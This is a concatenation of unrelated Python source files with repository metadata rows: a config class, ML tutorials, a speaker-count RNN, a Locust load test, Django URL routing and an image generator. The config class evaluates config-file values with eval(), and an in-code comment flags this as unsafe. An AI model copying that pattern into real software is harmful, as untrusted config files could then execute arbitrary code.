            return str(LightConfig.Section._as_dict(self))
        def __repr__(self):
            return repr(LightConfig.Section._as_dict(self))
        def __iter__(self):
            return iter(LightConfig.Section._as_dict(self).items())
        def __getattribute__(self, item):
            if item in ('keys', '__dict__'):
                return super(LightConfig.Section, self).__getattribute__(item)
            else:
                return LightConfig.Section.__getattr__(self, item)
        def __getattr__(self, option):
            # Re-read the file first if it changed on disk.
            current_stamp = LightConfig._stamp(self.__dict__['_conf'])
            if current_stamp != self.__dict__['_conf'].__dict__['_cached_stamp']:
                LightConfig._read(self.__dict__['_conf'])
                self.__dict__['_conf'].__dict__['_cached_stamp'] = current_stamp
            value = self.__dict__['_conf'].__dict__['_config'].get(self.__dict__['_section'], option)
            if self.__dict__['_try_convert_digit']:
                # NOTE(review): eval() executes arbitrary expressions taken
                # from the config file -- unsafe if the file is not trusted.
                try:
                    value = eval(value)
                except:
                    pass
            return value
        __getitem__ = __getattr__
        def __setattr__(self, key, value):
            # Write-through: create the section if needed, then save to disk.
            if not self.__dict__['_section'] in self.__dict__['_conf']:
                self.__dict__['_conf'].__dict__['_config'].add_section(self.__dict__['_section'])
            self.__dict__['_conf'].__dict__['_config'].set(self.__dict__['_section'], key, str(value))
            LightConfig._save(self.__dict__['_conf'])
        __setitem__ = __setattr__
        def __delattr__(self, item):
            if item in self:
                self.__dict__['_conf'].__dict__['_config'].remove_option(self.__dict__['_section'], item)
                LightConfig._save(self.__dict__['_conf'])
        __delitem__ = __delattr__
        def __contains__(self, item):
            return self.__dict__['_conf'].__dict__['_config'].has_option(self.__dict__['_section'], item)
        def _as_dict(self):
            return dict(self.__dict__['_conf'].__dict__['_config'].items(self.__dict__['_section']))
        def keys(self):
            return self.__dict__['_conf'].__dict__['_config'].options(self.__dict__['_section'])
3393bcf3b27570f5d59ffe21a0c2d9ebb337faa5 | 2,414 | py | Python | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | 6 | 2020-12-10T00:39:38.000Z | 2022-02-10T20:16:04.000Z | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | null | null | null | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | null | null | null | """
This script shows the usage of scikit-learns linear regression functionality.
"""
# %% [markdown]
# # Linear Regression using Scikit-Learn #
# %% [markdown]
# ## Ice Cream Dataset ##
# | Temperature C° | Ice Cream Sales |
# |:--------------:|:---------------:|
# | 15 | 34 |
# | 24 | 587 |
# | 34 | 1200 |
# | 31 | 1080 |
# | 29 | 989 |
# | 26 | 734 |
# | 17 | 80 |
# | 11 | 1 |
# | 23 | 523 |
# | 25 | 651 |
# %% [markdown]
# ### Dependencies ###
# Install Numpy for number crunching and Matplotlib for plotting graphs:
# ```bash
# pip install sklearn
# ```
# %% [markdown]
# ### Imports ###
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# %% [markdown]
# ### Ice Cream Dataset as Numpy Array ###
# Columns: [temperature C, ice cream sales]; the last three rows extend the
# table above with cold-weather zero-sales points.
data = np.array([[15, 34],
                 [24, 587],
                 [34, 1200],
                 [31, 1080],
                 [29, 989],
                 [26, 734],
                 [17, 80],
                 [11, 1],
                 [23, 523],
                 [25, 651],
                 [0, 0],
                 [2, 0],
                 [12, 5]])
# %% [markdown]
# ### Plotting the Dataset ###
x_values, y_values = data.T
plt.style.use('ggplot')
plt.scatter(x_values, y_values)
plt.show()
# %% [markdown]
# ### Prepare Train and Test Data ###
# NOTE(review): the split is unseeded (no random_state), so results differ
# run to run. sklearn expects 2-D feature arrays, hence the reshapes.
x_train, x_test, y_train, y_test = train_test_split(
    x_values, y_values, test_size=1/3)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
y_train = y_train.reshape(-1, 1)
y_test = y_test.reshape(-1, 1)
# %% [markdown]
# ### Train model ###
regression = linear_model.LinearRegression()
regression.fit(x_train, y_train)
# %% [markdown]
# ### Predict ###
y_prediction = regression.predict(x_test)
# %% [markdown]
# ### Plot Predicted Results ###
plt.scatter(x_test, y_test)
plt.plot(x_test, y_prediction, color='blue')
plt.show()
# %% [markdown]
# ### Print Metrics ###
print('Coefficient: \n', regression.coef_)
print('Intercept: \n', regression.intercept_)
print('Mean Squared Error: %.2f' % mean_squared_error(y_test, y_prediction))
| 22.146789 | 77 | 0.511599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,194 | 0.49441 |
339506ce1e95c27d7ca74c94295129c3b605e640 | 9,195 | py | Python | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | from datetime import datetime
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
import tensorflow_probability as tfp
from sklearn.metrics import mean_absolute_error
from tensorflow.python.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
from tensorflow.python.keras.optimizer_v2.adam import Adam
from TestSetGenerator import TestSetGenerator
from TimingCallback import TimingCallback
from TrainSetGenerator import TrainSetGenerator
from helpers import write_log
tfd = tfp.distributions  # module alias; appears unreferenced in this file's visible code
from tensorflow.keras.layers import Dense, InputLayer, Bidirectional, LSTM, Masking
from tensorflow.keras.models import Sequential
from scipy.stats import poisson
import matplotlib.pyplot as plt
class RNN:
    """
    Recurrent neural network to train speaker count estimation with
    """
    # Training configuration
    batch_size = 128
    num_epochs = 80
    tensorboard_log = f'./tensorboard/{datetime.now().strftime("%m-%d %H:%M")}/'
    # Training callbacks (populated per instance in __init__)
    callbacks: list
    # If set, save model to the filename after training
    __save_to_file: str = None
    # The trained network
    __net = None
    # To reproduce
    random_state = 1337
    # Set num_files_to_merge on the train/validation generators to this value * len(set). We will re-use each file this number of times
    use_train_files_times = 5
    use_validation_files_times = 2

    def __init__(self):
        """
        Set callbacks on init
        """
        tensorboard = tf.keras.callbacks.TensorBoard(log_dir=self.tensorboard_log)
        early_stopping = EarlyStopping(patience=15, verbose=1)
        reduce_lr_on_plateau = ReduceLROnPlateau(factor=.4, patience=7, verbose=1)
        timing = TimingCallback()
        self.callbacks = [tensorboard, early_stopping, reduce_lr_on_plateau, timing]

    def load_from_file(self, file):
        """
        Load the network from filesystem
        :param file: The file path
        """
        self.__net = tf.keras.models.load_model(file)

    def get_net(self, input_shape: tuple):
        """
        Get the network. We use a BiLSTM as described by Stöter et al.
        :param input_shape: the input shape: [batch_size, time_steps, n_features]
        :return: The net
        """
        net = Sequential()
        net.add(InputLayer(input_shape=input_shape))
        # Mask the input
        net.add(Masking())
        # Add BiLSTM layers
        net.add(Bidirectional(LSTM(30, activation='tanh', return_sequences=True, dropout=0.5)))
        net.add(Bidirectional(LSTM(20, activation='tanh', return_sequences=True, dropout=0.5)))
        net.add(Bidirectional(LSTM(40, activation='tanh', return_sequences=False, dropout=0.5)))
        net.add(Dense(20, activation='relu'))
        # The network predicts scale parameter \lambda for the poisson distribution
        net.add(Dense(1, activation='exponential'))
        return net

    def save_to_file(self, file):
        """
        Set the filename to save our best performing model to
        Also add callback to save the best model
        :param file:
        """
        self.__save_to_file = file
        self.callbacks.append(ModelCheckpoint(file, save_best_only=True))

    @staticmethod
    def poisson(y_true, y_hat):
        """
        [Deprecated] - we use keras.losses.Poisson() instead
        Since we are predicting a Poisson distribution, our loss function is the poisson loss
        :param y_true: Number of speakers
        :param y_hat: Lambda for poisson
        :return:
        """
        theta = tf.cast(y_hat, tf.float32)
        y = tf.cast(y_true, tf.float32)
        loss = K.mean(theta - y * K.log(theta + K.epsilon()))
        return loss

    def compile_net(self, input_shape: tuple):
        """
        Get the network and compile and save it
        :param input_shape: The input shape
        :return:
        """
        net = self.get_net(input_shape)
        optimizer = Adam(learning_rate=.001)
        net.compile(loss=tf.keras.losses.Poisson(), optimizer=optimizer, metrics=[tf.keras.metrics.MeanAbsoluteError()])
        self.__net = net
        return self.__net

    def __get_train_data(self, files: np.ndarray, min_speakers: int, max_speakers: int, feature_type: str):
        """
        Get train generator and validation set
        - We create a set for validation instead of a generator, such that we validate on the same set each time
        - This also speeds up validation during the training loop drastically, since we only preprocess the validation set once
        :param files: All files, will be split .8/0.2 for train/val
        :param min_speakers: The min number of speakers to generate files for
        :param max_speakers: The max number of speakers to generate files for
        :param feature_type: The feature type
        :return: train_generator, (val_x, val_y)
        """
        # Split files into train/val (in-place shuffle, 80/20 split)
        np.random.shuffle(files)
        split_index = int(len(files) * .8)
        train_files = files[:split_index]
        validation_files = files[split_index:]
        # Train generator
        train_generator = TrainSetGenerator(train_files, self.batch_size, feature_type)
        train_generator.set_limits(min_speakers, max_speakers)
        train_generator.set_num_files_to_merge(self.use_train_files_times * len(train_files))
        # Validation generator
        validation_generator = TrainSetGenerator(validation_files, self.batch_size, feature_type)
        validation_generator.set_limits(min_speakers, max_speakers)
        # No augmentation on the validation set
        validation_generator.augment = False
        validation_generator.set_num_files_to_merge(self.use_validation_files_times * len(validation_files))
        # Generate a full set (materialize the first yielded batch as the fixed validation set)
        validation_set = list(validation_generator.__iter__())[0]
        val_x, val_y = validation_set[0], validation_set[1]
        return train_generator, (val_x, val_y)

    def train(self, files: np.ndarray, min_speakers: int, max_speakers: int, feature_type: str):
        """
        Train the network, eg
        - Create data generators
        - Train with Adam, Poisson loss, MeanAbsoluteError metric.
        - Visualize using Tensorboard
        :param files: All files
        :param min_speakers: The min number of speakers to generate files for
        :param max_speakers: The max number of speakers to generate files for
        :param feature_type: Feature type to use
        """
        train_generator, (val_x, val_y) = self.__get_train_data(files, min_speakers, max_speakers, feature_type)
        net = self.compile_net(train_generator.feature_shape)
        write_log('Training model')
        history = net.fit(
            train_generator,
            validation_data=(val_x, val_y),
            epochs=self.num_epochs,
            callbacks=self.callbacks,
            verbose=1,
        )
        write_log('Model trained')
        return net, history

    def test(self, X: np.ndarray, Y: np.ndarray, feature_type: str, plot_result=False):
        """
        Test the network:
        - Compute the MAE for each count in Y
        - Compute MAE where y in [1, 10]
        - Compute MAE where y in [1, 20]
        - Compute the MAE over all labels
        :param X: The test data set (list of files)
        :param Y: The labels
        :param feature_type: Feature type to use
        :return MAE
        """
        if self.__net is None:
            # NOTE(review): execution continues after this call; presumably
            # write_log(..., True, True) aborts -- verify its implementation.
            write_log('Cannot test the network, as it is not initialized. Please train your model, or load it from filesystem', True, True)
        write_log('Testing network')
        generator = TestSetGenerator(X, Y, self.batch_size, feature_type)
        Y_hat = self.__net.predict(generator)
        # Convert predictions to int: take median of poisson distribution
        # (`poisson` here is scipy.stats.poisson from the module imports,
        # not the deprecated static method above)
        predictions = np.array([int(poisson(y_hat[0]).median()) for y_hat in Y_hat])
        errors = {}
        # Per-speaker-count MAE
        for speaker_count in range(min(Y), max(Y) + 1):
            indices_with_count = np.argwhere(Y == speaker_count)
            y_current = Y[indices_with_count]
            predictions_current = predictions[indices_with_count]
            error = mean_absolute_error(y_current, predictions_current)
            errors[speaker_count] = error
        # Aggregate MAE over label ranges [1, 10] and [1, 20]
        for max_count in [10, 20]:
            indices = np.argwhere(np.logical_and(Y >= 1, Y <= max_count))
            errors[f'1_to_{max_count}'] = mean_absolute_error(Y[indices], predictions[indices])
        errors['mean'] = mean_absolute_error(Y, predictions)
        if plot_result:
            self.__plot_test_results(errors)
        return errors

    def __plot_test_results(self, errors):
        """
        Create plot of results of self.test()
        :param errors: The errors computed in test()
        """
        # Collect the per-count errors for counts 1..20 that are present.
        x, y = [], []
        for i in range(1, 21):
            if i in errors:
                x.append(i)
                y.append(errors[i])
        plt.plot(x, y)
        plt.plot(errors['1_to_10'], 'o')
        plt.title("Error per speaker count")
        plt.ylabel('MAE')
        plt.xlabel('Max number of speakers')
        plt.ylim(0, 10)
        plt.show()
| 39.12766 | 139 | 0.657423 | 8,455 | 0.919421 | 0 | 0 | 488 | 0.053067 | 0 | 0 | 3,371 | 0.366572 |
3397953b644d0f59b96f9efd7c056d0243abb45a | 380 | py | Python | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | from locust import HttpLocust, TaskSet, task
class WebsiteTasks(TaskSet):
    """Locust task set: POST a fixed JSON message to the /SHOUTCLOUD endpoint."""

    @task
    def bcrypt(self):
        # Fixed JSON body; the header marks the payload as JSON.
        body = '{"message":"hello world"}'
        self.client.post("/SHOUTCLOUD", body, headers={"Content-type": "application/json"})
class WebsiteUser(HttpLocust):
    # Simulated user: runs WebsiteTasks with a constant wait of 1 between
    # tasks (min_wait == max_wait; per Locust convention presumably
    # milliseconds -- verify against the Locust version in use).
    task_set = WebsiteTasks
    min_wait = 1
    max_wait = 1
| 27.142857 | 67 | 0.642105 | 323 | 0.85 | 0 | 0 | 198 | 0.521053 | 0 | 0 | 72 | 0.189474 |
3398cb226db154c17c5156d32cace490ac81678b | 198 | py | Python | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | colors = ['black', 'white']
sizes = ['S', 'M', 'L']
# Build every (color, size) pairing -- the Cartesian product of the two lists.
tshirts = []
for shade in colors:
    for fit in sizes:
        tshirts.append((shade, fit))
print(f"Cartesian products from {colors} and {sizes}: {tshirts}")
| 18 | 65 | 0.59596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.409091 |
3399587139e4c6f0b9e4a5bc16f77ab6a41e223b | 807 | py | Python | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2019-01-17T21:03:51.000Z | 2019-01-17T21:03:51.000Z | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | # create this file
# rerouting all requests that have ‘api’ in the url to the <code>apps.core.urls
from django.conf.urls import url
from django.urls import path
from rest_framework import routers
from base.src import views
from base.src.views import InitViewSet
#from base.src.views import UploadFileForm
#upload stuff
from django.conf import settings
from django.conf.urls.static import static
# DRF router: auto-generates the CRUD routes for the user/group viewsets.
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
#router.register(r'titles', TitlesViewSet, base_name='titles')
# Explicit PAWSC endpoints, plus the router-generated URLs appended below.
urlpatterns = [
    path(r'pawsc', InitViewSet.as_view()),
    path(r'pawsc/upload', views.simple_upload, name='simple_upload'),
    path(r'pawsc/home', views.home, name='home')
]
urlpatterns += router.urls
| 26.9 | 79 | 0.759603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 292 | 0.360049 |
33998c2c6881fb81dfbebc65e0a2eb0c23324496 | 2,456 | py | Python | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
'''test_Rainbow_pen
'''
import sys, os
import numpy as np
from matplotlib import pyplot as plt
from PIL import Image
FN_OUT = 'rainbow_pen_320x240.png'  # output path for the saved RGBA image
def mk_col(w, h, x, y):
    """Return (band index, alpha, base colour, shade offset u, shade offset v)
    for the rainbow band that row ``y`` of an ``h``-pixel-tall image falls in.

    ``w`` and ``x`` are accepted for a uniform pixel-function signature but
    are not used here.
    """
    # (base colour, offset u, offset v) for each of the 7 bands, top to bottom.
    bands = (
        ((192, 0, 0), (32, 0, 0), (0, 32, 0)),      # R
        ((192, 96, 0), (0, -32, 0), (0, 32, 0)),    # O-
        ((192, 192, 0), (0, -32, 0), (-32, 0, 0)),  # Y
        ((0, 192, 0), (64, 0, 0), (0, 0, 64)),      # G
        ((0, 192, 192), (0, 0, -64), (0, -64, 0)),  # C
        ((0, 0, 192), (0, 64, 0), (32, 0, 0)),      # B
        ((96, 0, 192), (-32, 0, 0), (32, 0, 0)),    # M-
    )
    band = int(7 * y / h)
    base, offset_u, offset_v = bands[band]
    return (band, 255, base, offset_u, offset_v)
def mk_dum(w, h, x, y):
    """Fully-shaped RGBA pixel for the swatch panels: band colour + band alpha."""
    _band, alpha, (r, g, b), _u, _v = mk_col(w, h, x, y)
    return (r, g, b, alpha)
def mk_rainbow(w, h, x, y):
    """Compute the RGBA value for pixel (x, y) of a w x h rainbow-pen image."""
    # return (x % 256, y % 256, 128, 255)
    i, a, (r, g, b), u, v = mk_col(w, h, x, y)
    # d: band height in pixels; z: row offset within the band; e: a third of d.
    d = h / 7.0
    z = int(y - i * d)
    e = d / 3.0
    # f selects the shading third: top third -> +u, bottom third -> +v.
    f = 1 if z < e else (-1 if z > 2*e else 0)
    rgb = np.array((r, g, b))
    if f > 0: rgb += np.array(u)
    if f < 0: rgb += np.array(v)
    r, g, b = rgb
    # Left quarter of the image: draw the pen-tip shape (presumably a nib
    # taper; the geometry narrows with x -- see the j/k comparison).
    if x < w / 4:
        j, k = 2.0 * d * x / w, d / 2.0
        t = z + j < k or z - j > k
        if x < w / 36 or t: return (255, 255, 255, 0) # transparent
        if x < w / 12: return (r, g, b, a)
        else: return (224, 128, 0, 255) # light brown
    return (r, g, b, a)
def rainbow_pen(w, h):
    """Render a w x h rainbow-pen image, save it to FN_OUT, and show panels."""
    fig = plt.figure(figsize=(6, 4), dpi=96)
    # Opaque colour-swatch image (per-pixel via mk_dum).
    dm = np.ndarray((h, w, 4), dtype=np.uint8)
    for y in range(h):
        for x in range(w):
            dm[y][x] = mk_dum(w, h, x, y)
    dum = Image.fromarray(dm[::-1,:,:], 'RGBA')
    # Rainbow-pen image with transparency (per-pixel via mk_rainbow);
    # the [::-1] flips rows so the image displays right side up.
    im = np.ndarray((h, w, 4), dtype=np.uint8)
    for y in range(h):
        for x in range(w):
            im[y][x] = mk_rainbow(w, h, x, y)
    img = Image.fromarray(im[::-1,:,:], 'RGBA')
    # NOTE: saved un-flipped, unlike the displayed version.
    Image.fromarray(im, 'RGBA').save(FN_OUT, 'PNG')
    # 2x3 grid: RGBA, grayscale, heatmap, YCbCr, and two swatch panels.
    ax = fig.add_subplot(231)
    ax.imshow(img)
    ax = fig.add_subplot(232)
    ax.imshow(img.convert('L'), cmap='gray', vmin=0, vmax=255)
    ax = fig.add_subplot(233)
    ax.imshow(img.convert('L')) # auto heatmap
    ax = fig.add_subplot(234)
    ax.imshow(img.convert('YCbCr')) # ok ?
    ax = fig.add_subplot(235)
    ax.imshow(dum) # img.convert('LAB')) # not supported on PIL <= py 2.5 ?
    ax = fig.add_subplot(236)
    ax.imshow(dum) # img.convert('HSV')) # not supported on PIL <= py 2.5 ?
    plt.show()
if __name__ == '__main__':
    # Render the default 320x240 image (matches the FN_OUT filename).
    rainbow_pen(320, 240)
| 29.590361 | 73 | 0.513844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 390 | 0.158795 |
3399c4cddcb4d17b9d9aef1da6a020e45290b8d3 | 15,780 | py | Python | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 16 17:31:42 2015
This is adapted from the kaggle tutorial for the National Data Science Bowl at
https://www.kaggle.com/c/datasciencebowl/details/tutorial
Any code section lifted from the tutorial will start with # In tutorial [n].
My adaption will start with # Adapted
2/21/2015: I skipped over all the buildup stuff and just used the functions
they summarized it in. Works fine.
DONE: 1. Create a file with all that other stuff removed.
DONE: 2. Then adapt the file references back to what Chris simplified it to and
make sure it runs.
3. Write/adapt the code to build a submission
4. Figure out how this fits with CNNs.
@author: kperez-lopez
"""
# In tutorial [1]:
from skimage.io import imread
from skimage.transform import resize
from sklearn.ensemble import RandomForestClassifier as RF
import glob
import os
from sklearn import cross_validation
from sklearn.cross_validation import StratifiedKFold as KFold
from sklearn.metrics import classification_report
from matplotlib import pyplot as plt
from matplotlib import colors
from pylab import cm
from skimage import segmentation
from skimage.morphology import watershed
from skimage import measure
from skimage import morphology
import numpy as np
import pandas as pd
from scipy import ndimage
from skimage.feature import peak_local_max
# make graphics inline
# Editor says this is an error.
# TODO: figure out why.
# %matplotlib inline -I've got IPython console set to "automatic," which yields
# a separate window for graphics
# In tutorial [2]: ( don't know why they include this)
import warnings
# Silence all warnings (deprecation chatter from the imaging/ML libraries).
warnings.filterwarnings("ignore")
path = "./"
# set.difference(...) drops entries in train/ that contain a dot (i.e. files
# with extensions such as list.txt), leaving only class subdirectories.
train_dir_names = \
    list(set(glob.glob(os.path.join(path, "train", "*"))).
         difference(set(glob.glob(os.path.join(path, "train", "*.*")))))
train_dir_names.sort()
def getLargestRegion(props, labelmap, im_thresh):
    """Return the region in `props` with the largest filled area.

    Regions whose labelled pixels are less than 50% nonzero in `im_thresh`
    are ignored. Returns None when no region qualifies.
    """
    best = None
    for region in props:
        # Fraction of thresholded (nonzero) pixels inside this labelled region.
        coverage = sum(im_thresh[labelmap == region.label]) * 1.0 / region.area
        if coverage < 0.50:
            continue
        if best is None or best.filled_area < region.filled_area:
            best = region
    return best
# In Tutorial [9]:
"""
Now, we collect the previous steps together in a function to make it easily
repeatable.
"""
# Adapted from Tutorial [9]:
def getMinorMajorRatio(image):
    """Return the minor/major axis-length ratio of the largest segmented
    region in a greyscale `image`, or 0.0 when segmentation fails.
    """
    image = image.copy()
    # Create the thresholded image to eliminate some of the background:
    # pixels darker than the mean become foreground (1.0), the rest 0.
    im_thresh = np.where(image > np.mean(image), 0., 1.0)
    # Dilate the image to connect nearby foreground pixels
    im_dilated = morphology.dilation(im_thresh, np.ones((4, 4)))
    # Label connected components, then mask labels back to thresholded pixels
    label_list = measure.label(im_dilated)
    label_list = im_thresh*label_list
    label_list = label_list.astype(int)
    regionprops_list = measure.regionprops(label_list)
    maxregion = getLargestRegion(regionprops_list, label_list, im_thresh)
    # Guard against cases where the segmentation fails (no region found, or
    # a degenerate zero-length major axis). The original additionally
    # re-checked `maxregion is None` inside this branch, which was
    # unreachable dead logic; it is removed here.
    if maxregion is not None and maxregion.major_axis_length != 0.0:
        return maxregion.minor_axis_length * 1.0 / maxregion.major_axis_length
    return 0.0
"""
Preparing Training Data
With our code for the ratio of minor to major axis, let's add the raw pixel
values to the list of features for our dataset. In order to use the pixel
values in a model for our classifier, we need a fixed length feature vector, so
we will rescale the images to be constant size and add the fixed number of
pixels to the feature vector.
To create the feature vectors, we will loop through each of the directories in
our training data set and then loop over each image within that class. For each
image, we will rescale it to 25 x 25 pixels and then add the rescaled pixel
values to a feature vector, X. The last feature we include will be our
width-to-length ratio. We will also create the class label in the vector y,
which will have the true class label for each row of the feature vector, X.
"""
# Adapted from Tutorial [10]
# Rescale the images and create the combined metrics and training labels
# get the total training images
# First pass: count the training images so the feature matrix can be sized.
numberofImages = 0
for folder in train_dir_names:
    for fileNameDir in os.walk(folder):
        # fileNameDir will be a 3-tuple, (dirpath, dirnames, filenames)
        # so we look at the last element, a list of the filenames
        # print fileNameDir
        for fileName in fileNameDir[2]:
            # Only read in the images
            if fileName[-4:] != ".jpg":
                continue
            numberofImages += 1
# We'll rescale the images to be 25x25=625
# Why 25? Why not 2**5 = 32?
maxPixel = 25
imageSize = maxPixel * maxPixel
num_rows = numberofImages # one row for each image in the training dataset
num_features = imageSize + 1 # for our ratio
# X is the ARRAY of feature vectors with one row of features per image
# consisting of the pixel values and our metric
X = np.zeros((num_rows, num_features), dtype=float)
# y is the numeric class label
# TODO why the double parens?
y = np.zeros((num_rows))
files = []
# Generate training data (second pass; this file uses Python 2 print syntax)
i = 0
label = 0
# List of string of class names
namesClasses = list()
print "Reading images"
# Navigate through the list of directories
for folder in train_dir_names:
    # Append the string class name for each class
    # NOTE(review): os.pathsep is the PATH-list separator (':' or ';'),
    # not the directory separator os.sep -- this split likely should use
    # os.sep; verify what class names end up in namesClasses.
    currentClass = folder.split(os.pathsep)[-1]
    print currentClass
    namesClasses.append(currentClass)
    for fileNameDir in os.walk(folder):
        for fileName in fileNameDir[2]:
            # Only read in the images
            if fileName[-4:] != ".jpg":
                continue
            # Read in the images and create the features
            nameFileImage = \
                "{0}{1}{2}".format(fileNameDir[0], os.sep, fileName)
            image = imread(nameFileImage, as_grey=True)
            files.append(nameFileImage)
            axisratio = getMinorMajorRatio(image)
            # TODO: check out exactly how skimage resizes
            image = resize(image, (maxPixel, maxPixel))
            # Store the rescaled image pixels and the axis ratio
            X[i, 0:imageSize] = np.reshape(image, (1, imageSize))
            X[i, imageSize] = axisratio
            # Store the classlabel
            y[i] = label
            i += 1
            # report progress for each 5% done
            report = [int((j+1)*num_rows/20.) for j in range(20)]
            if i in report:
                print np.ceil(i * 100.0 / num_rows), "% done"
    label += 1
"""
Width-to-Length Ratio Class Separation
Now that we have calculated the width-to-length ratio metric for all the
images, we can look at the class separation to see how well our feature
performs. We'll compare pairs of the classes' distributions by plotting each
pair of classes. While this will not cover the whole space of hundreds of
possible combinations, it will give us a feel for how similar or dissimilar
different classes are in this feature, and the class distributions should be
comparable across subplots.
"""
# From Tutorial [12]
# Loop through the classes two at a time and compare their distributions of
# the Width/Length Ratio
# Create a DataFrame object to make subsetting the data on the class
# DataFrame pairing each image's class label with its width/length ratio.
df = pd.DataFrame({"class": y[:], "ratio": X[:, num_features-1]})
f = plt.figure(figsize=(30, 20))
# Suppress zeros and choose a few large classes to better highlight the
# distributions.
# Here "large" means classes with more than minimumSize images remaining
# after the zero-ratio rows have been dropped.
df = df.loc[df["ratio"] > 0]
minimumSize = 20
counts = df["class"].value_counts()
largeclasses = [int(x) for x in list(counts.loc[counts > minimumSize].index)]
# Loop through 40 of the classes, comparing them two at a time
# (Python 2: j / 2 is integer division, giving subplot indices 1..20).
for j in range(0, 40, 2):
    subfig = plt.subplot(4, 5, j / 2 + 1)
    # Plot the normalized histograms for two classes
    # NOTE(review): hist(normed=...) is the pre-`density` API, removed in
    # modern matplotlib; fine for the version this tutorial targeted.
    classind1 = largeclasses[j]
    classind2 = largeclasses[j+1]
    n, bins, p = plt.hist(df.loc[df["class"] == classind1]["ratio"].values,
                          alpha=0.5, bins=[x*0.01 for x in range(100)],
                          label=namesClasses[classind1].split(os.sep)[-1],
                          normed=1)
    n2, bins, p = plt.hist(df.loc[df["class"] == (classind2)]["ratio"].values,
                           alpha=0.5, bins=bins,
                           label=namesClasses[classind2].split(os.sep)[-1],
                           normed=1)
    subfig.set_ylim([0., 10.])
    plt.legend(loc='upper right')
plt.xlabel("Width/Length Ratio")
# results = six histograms in 2x3 display
# TODO: this doesn't make sense, printing out 20 graphs on top of each other.
# Figure out how to display this reasonably.
"""
From the (truncated) figure above, you will see some cases where the classes
are well separated and others were they are not.
NB:
It is typical that one single
feature will not allow you to completely separate more than thirty distinct
classes. You will need to be creative in coming up with additional metrics to
discriminate between all the classes.
TODO: Figure out how CNN fits into this task.
"""
"""
TODO: Understand this thoroughly.
Random Forest Classification
We choose a random forest model to classify the images. Random forests perform
well in many classification tasks and have robust default settings. We will
give a brief description of a random forest model so that you can understand
its two main free parameters: n_estimators and max_features.
A random forest model is an ensemble model of n_estimators number of decision
trees. During the training process, each decision tree is grown automatically
by making a series of conditional splits on the data. At each split in the
decision tree, a random sample of max_features number of features is chosen and
used to make a conditional decision on which of the two nodes that the data
will be grouped in. The best condition for the split is determined by the split
that maximizes the class purity of the nodes directly below. The tree continues
to grow by making additional splits until the leaves are pure or the leaves
